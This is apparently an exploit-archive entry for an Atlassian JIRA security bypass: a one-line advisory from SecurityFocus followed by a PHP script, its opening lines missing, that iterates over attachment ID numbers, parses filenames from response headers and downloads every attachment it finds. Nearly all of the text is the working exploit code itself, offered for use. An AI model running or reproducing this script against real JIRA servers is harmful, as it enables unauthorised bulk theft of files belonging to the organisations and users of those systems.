source: https://www.securityfocus.com/bid/48484/info Atlassian JIRA is prone to a security bypass vulnerability. An attacker can exploit this issue to download arbitrary attachment files within the context of the affected application. = $argv[3]) { echo "\n\n#The second number must be bigger than the first one\n"; die; } $numero = $argv[2]; for ($numero;$numero <= $argv[3];$numero++) { $head = get_headers("$url$numero/"); if (substr ($head[0],9,3) == "404") { echo "\n#File number $numero not found! (404)\n"; } else{ $explodeo = explode("filename*=",$head[2]); $explodeo2 = explode(";",$explodeo[1]); $archivo = substr($explodeo2[0],7); echo "\n#Downloading file: $archivo\n"; $file=file_get_contents("$url$numero/$archivo"); file_put_contents($archivo,$file); } } echo "\n#All attachment downloaded correctly!\n"; die; ?>